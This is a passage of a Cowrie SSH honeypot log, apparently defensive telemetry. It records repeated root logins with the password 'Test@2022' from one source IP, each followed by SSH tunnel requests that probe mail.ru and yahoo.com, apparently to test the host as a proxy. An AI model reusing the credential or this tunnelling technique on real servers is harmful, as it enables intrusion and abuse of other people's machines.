-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-31T03:44:32.212154Z","src_ip":"77.83.207.83","session":"68207a874a19"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-31T03:44:32.463956Z","src_ip":"77.83.207.83","session":"68207a874a19"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"90.156.232.4","dst_port":80,"src_ip":"77.83.207.83","src_port":17799,"message":"direct-tcp connection request to 90.156.232.4:80 from 127.0.0.1:17799","sensor":"my-vps","timestamp":"2025-08-31T03:44:32.515442Z","session":"68207a874a19"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"90.156.232.4","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 90.156.232.4:80 with data b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:44:32.566188Z","src_ip":"77.83.207.83","session":"68207a874a19"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"74.6.231.21","dst_port":80,"src_ip":"77.83.207.83","src_port":1482,"message":"direct-tcp connection request to 74.6.231.21:80 from 127.0.0.1:1482","sensor":"my-vps","timestamp":"2025-08-31T03:44:32.708944Z","session":"68207a874a19"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"74.6.231.21","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 74.6.231.21:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:44:32.759508Z","src_ip":"77.83.207.83","session":"68207a874a19"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:44:3507::8000","dst_port":80,"src_ip":"77.83.207.83","src_port":5339,"message":"direct-tcp connection request to 2001:4998:44:3507::8000:80 from 127.0.0.1:5339","sensor":"my-vps","timestamp":"2025-08-31T03:44:32.900836Z","session":"68207a874a19"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:44:3507::8000","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":2,"message":"discarded direct-tcp forward request 2 to 2001:4998:44:3507::8000:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:44:32.951394Z","src_ip":"77.83.207.83","session":"68207a874a19"}
{"eventid":"cowrie.session.closed","duration":"0.8","message":"Connection lost after 0.8 seconds","sensor":"my-vps","timestamp":"2025-08-31T03:44:33.002740Z","src_ip":"77.83.207.83","session":"68207a874a19"}
{"eventid":"cowrie.session.connect","src_ip":"77.83.207.83","src_port":43417,"dst_ip":"1.2.3.4","dst_port":22,"session":"1fd4d37925e0","protocol":"ssh","message":"New connection: 77.83.207.83:43417 (1.2.3.4:22) [session: 1fd4d37925e0]","sensor":"my-vps","timestamp":"2025-08-31T03:44:33.051453Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-31T03:44:33.061841Z","src_ip":"77.83.207.83","session":"1fd4d37925e0"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-31T03:44:33.101694Z","src_ip":"77.83.207.83","session":"1fd4d37925e0"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-31T03:44:33.349500Z","src_ip":"77.83.207.83","session":"1fd4d37925e0"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"89.221.239.1","dst_port":80,"src_ip":"77.83.207.83","src_port":32560,"message":"direct-tcp connection request to 89.221.239.1:80 from 127.0.0.1:32560","sensor":"my-vps","timestamp":"2025-08-31T03:44:33.400838Z","session":"1fd4d37925e0"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"89.221.239.1","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 89.221.239.1:80 with data b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:44:33.450625Z","src_ip":"77.83.207.83","session":"1fd4d37925e0"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"74.6.231.20","dst_port":80,"src_ip":"77.83.207.83","src_port":27041,"message":"direct-tcp connection request to 74.6.231.20:80 from 127.0.0.1:27041","sensor":"my-vps","timestamp":"2025-08-31T03:44:33.592262Z","session":"1fd4d37925e0"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"74.6.231.20","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 74.6.231.20:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:44:33.642165Z","src_ip":"77.83.207.83","session":"1fd4d37925e0"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:24:120d::1:1","dst_port":80,"src_ip":"77.83.207.83","src_port":6364,"message":"direct-tcp connection request to 2001:4998:24:120d::1:1:80 from 127.0.0.1:6364","sensor":"my-vps","timestamp":"2025-08-31T03:44:33.784103Z","session":"1fd4d37925e0"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:24:120d::1:1","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":2,"message":"discarded direct-tcp forward request 2 to 2001:4998:24:120d::1:1:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:44:33.834013Z","src_ip":"77.83.207.83","session":"1fd4d37925e0"}
{"eventid":"cowrie.session.closed","duration":"0.8","message":"Connection lost after 0.8 seconds","sensor":"my-vps","timestamp":"2025-08-31T03:44:33.884982Z","src_ip":"77.83.207.83","session":"1fd4d37925e0"}
{"eventid":"cowrie.session.connect","src_ip":"77.83.207.83","src_port":43511,"dst_ip":"1.2.3.4","dst_port":22,"session":"d120f4747f90","protocol":"ssh","message":"New connection: 77.83.207.83:43511 (1.2.3.4:22) [session: d120f4747f90]","sensor":"my-vps","timestamp":"2025-08-31T03:44:33.934042Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-31T03:44:33.934996Z","src_ip":"77.83.207.83","session":"d120f4747f90"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-31T03:44:33.984780Z","src_ip":"77.83.207.83","session":"d120f4747f90"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-31T03:44:34.233092Z","src_ip":"77.83.207.83","session":"d120f4747f90"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"185.180.201.1","dst_port":80,"src_ip":"77.83.207.83","src_port":23013,"message":"direct-tcp connection request to 185.180.201.1:80 from 127.0.0.1:23013","sensor":"my-vps","timestamp":"2025-08-31T03:44:34.284120Z","session":"d120f4747f90"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"185.180.201.1","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 185.180.201.1:80 with data b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:44:34.334135Z","src_ip":"77.83.207.83","session":"d120f4747f90"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"74.6.231.20","dst_port":80,"src_ip":"77.83.207.83","src_port":31563,"message":"direct-tcp connection request to 74.6.231.20:80 from 127.0.0.1:31563","sensor":"my-vps","timestamp":"2025-08-31T03:44:34.476097Z","session":"d120f4747f90"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"74.6.231.20","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 74.6.231.20:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:44:34.525863Z","src_ip":"77.83.207.83","session":"d120f4747f90"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:44:3507::8000","dst_port":80,"src_ip":"77.83.207.83","src_port":17707,"message":"direct-tcp connection request to 2001:4998:44:3507::8000:80 from 127.0.0.1:17707","sensor":"my-vps","timestamp":"2025-08-31T03:44:34.668208Z","session":"d120f4747f90"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:44:3507::8000","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":2,"message":"discarded direct-tcp forward request 2 to 2001:4998:44:3507::8000:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:44:34.718388Z","src_ip":"77.83.207.83","session":"d120f4747f90"}
{"eventid":"cowrie.session.closed","duration":"0.8","message":"Connection lost after 0.8 seconds","sensor":"my-vps","timestamp":"2025-08-31T03:44:34.769250Z","src_ip":"77.83.207.83","session":"d120f4747f90"}
{"eventid":"cowrie.session.connect","src_ip":"77.83.207.83","src_port":43601,"dst_ip":"1.2.3.4","dst_port":22,"session":"63e0b9572127","protocol":"ssh","message":"New connection: 77.83.207.83:43601 (1.2.3.4:22) [session: 63e0b9572127]","sensor":"my-vps","timestamp":"2025-08-31T03:44:34.817988Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-31T03:44:34.818974Z","src_ip":"77.83.207.83","session":"63e0b9572127"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-31T03:44:34.868539Z","src_ip":"77.83.207.83","session":"63e0b9572127"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-31T03:44:35.116905Z","src_ip":"77.83.207.83","session":"63e0b9572127"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"90.156.232.4","dst_port":80,"src_ip":"77.83.207.83","src_port":3653,"message":"direct-tcp connection request to 90.156.232.4:80 from 127.0.0.1:3653","sensor":"my-vps","timestamp":"2025-08-31T03:44:35.167391Z","session":"63e0b9572127"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"90.156.232.4","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 90.156.232.4:80 with data b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:44:35.217099Z","src_ip":"77.83.207.83","session":"63e0b9572127"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"90.156.232.4","dst_port":80,"src_ip":"77.83.207.83","src_port":16038,"message":"direct-tcp connection request to 90.156.232.4:80 from 127.0.0.1:16038","sensor":"my-vps","timestamp":"2025-08-31T03:44:35.360009Z","session":"63e0b9572127"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"90.156.232.4","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 90.156.232.4:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:44:35.409619Z","src_ip":"77.83.207.83","session":"63e0b9572127"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:24:120d::1:0","dst_port":80,"src_ip":"77.83.207.83","src_port":21685,"message":"direct-tcp connection request to 2001:4998:24:120d::1:0:80 from 127.0.0.1:21685","sensor":"my-vps","timestamp":"2025-08-31T03:44:35.552001Z","session":"63e0b9572127"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:24:120d::1:0","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":2,"message":"discarded direct-tcp forward request 2 to 2001:4998:24:120d::1:0:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:44:35.601859Z","src_ip":"77.83.207.83","session":"63e0b9572127"}
{"eventid":"cowrie.session.closed","duration":"0.8","message":"Connection lost after 0.8 seconds","sensor":"my-vps","timestamp":"2025-08-31T03:44:35.652406Z","src_ip":"77.83.207.83","session":"63e0b9572127"}
{"eventid":"cowrie.session.connect","src_ip":"77.83.207.83","src_port":43685,"dst_ip":"1.2.3.4","dst_port":22,"session":"cab4bba89340","protocol":"ssh","message":"New connection: 77.83.207.83:43685 (1.2.3.4:22) [session: cab4bba89340]","sensor":"my-vps","timestamp":"2025-08-31T03:44:35.701083Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-31T03:44:35.702126Z","src_ip":"77.83.207.83","session":"cab4bba89340"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-31T03:44:35.751882Z","src_ip":"77.83.207.83","session":"cab4bba89340"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-31T03:44:36.000143Z","src_ip":"77.83.207.83","session":"cab4bba89340"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"89.221.239.1","dst_port":80,"src_ip":"77.83.207.83","src_port":26538,"message":"direct-tcp connection request to 89.221.239.1:80 from 127.0.0.1:26538","sensor":"my-vps","timestamp":"2025-08-31T03:44:36.051236Z","session":"cab4bba89340"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"89.221.239.1","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 89.221.239.1:80 with data b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:44:36.101516Z","src_ip":"77.83.207.83","session":"cab4bba89340"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"74.6.231.20","dst_port":80,"src_ip":"77.83.207.83","src_port":15031,"message":"direct-tcp connection request to 74.6.231.20:80 from 127.0.0.1:15031","sensor":"my-vps","timestamp":"2025-08-31T03:44:36.244215Z","session":"cab4bba89340"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"74.6.231.20","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 74.6.231.20:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:44:36.294318Z","src_ip":"77.83.207.83","session":"cab4bba89340"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:44:3507::8001","dst_port":80,"src_ip":"77.83.207.83","src_port":20068,"message":"direct-tcp connection request to 2001:4998:44:3507::8001:80 from 127.0.0.1:20068","sensor":"my-vps","timestamp":"2025-08-31T03:44:36.436327Z","session":"cab4bba89340"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:44:3507::8001","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":2,"message":"discarded direct-tcp forward request 2 to 2001:4998:44:3507::8001:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:44:36.486326Z","src_ip":"77.83.207.83","session":"cab4bba89340"}
{"eventid":"cowrie.session.closed","duration":"0.8","message":"Connection lost after 0.8 seconds","sensor":"my-vps","timestamp":"2025-08-31T03:44:36.536771Z","src_ip":"77.83.207.83","session":"cab4bba89340"}
{"eventid":"cowrie.session.connect","src_ip":"77.83.207.83","src_port":43769,"dst_ip":"1.2.3.4","dst_port":22,"session":"ef6febf8023f","protocol":"ssh","message":"New connection: 77.83.207.83:43769 (1.2.3.4:22) [session: ef6febf8023f]","sensor":"my-vps","timestamp":"2025-08-31T03:44:36.587023Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-31T03:44:36.587866Z","src_ip":"77.83.207.83","session":"ef6febf8023f"}
